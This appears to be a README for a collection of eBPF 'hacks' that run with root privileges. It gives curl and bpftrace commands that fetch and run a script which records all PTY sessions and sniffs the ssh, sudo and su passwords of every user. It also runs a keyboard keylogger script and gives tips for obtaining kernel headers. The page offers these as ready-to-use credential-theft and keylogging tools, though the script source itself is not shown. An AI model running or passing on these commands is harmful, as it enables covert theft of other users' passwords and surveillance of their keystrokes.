Home

Awesome

eBPF tools

A (short) collecton of eBPF enabled tools (need root privileges to run);

Prerequisite: Install the latest bpftrace tool:

curl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace
chmod 755 bpftrace

Project #1 - Sniff all ssh/login/xterm session:

Record all PTY sessions and sniffs all ssh/sudo/su passwords of all users.

curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt
export BPFTRACE_MAX_STRLEN=200
./bpftrace -Bnone ptysnoop.bt
<p align="center"> <img width="675" alt="ptysnoop" src="https://github.com/hackerschoice/bpfhacks/assets/5938498/de068ae5-9cea-44fc-83a6-56e4d37dee93"> </p>

Tools by others: SSHLog.

Project #2 - Keylogger:

Record all keys pressed on the keyboard:

./bpftrace -Bnone keylogger.bt
<p align="center"> <img alt="keuylogger" src="https://github.com/hackerschoice/bpfhacks/assets/5938498/2d9d90bf-497d-4cc7-9583-5b8c162231b6"> </p>

TIPS & TRICKS

It may complain about missing Linux Kernel header files. Download them to a local directory:

wget https://debian.sipwise.com/debian-security/pool/main/l/linux/linux-headers-...
dpkg-deb -xv linux-headers-*.deb "$(pwd)"
export BPFTRACE_KERNEL_SOURCE="$(echo "$(pwd)/usr/src/linux-headers-"*)"
sed '/generated\/autoconf.h/d' -i "${BPFTRACE_KERNEL_SOURCE}/include/linux/kconfig.h"

Check for BPF support in the Kernel (it is enabled by default):

grep CONFIG_BPF /boot/config-$(uname -r)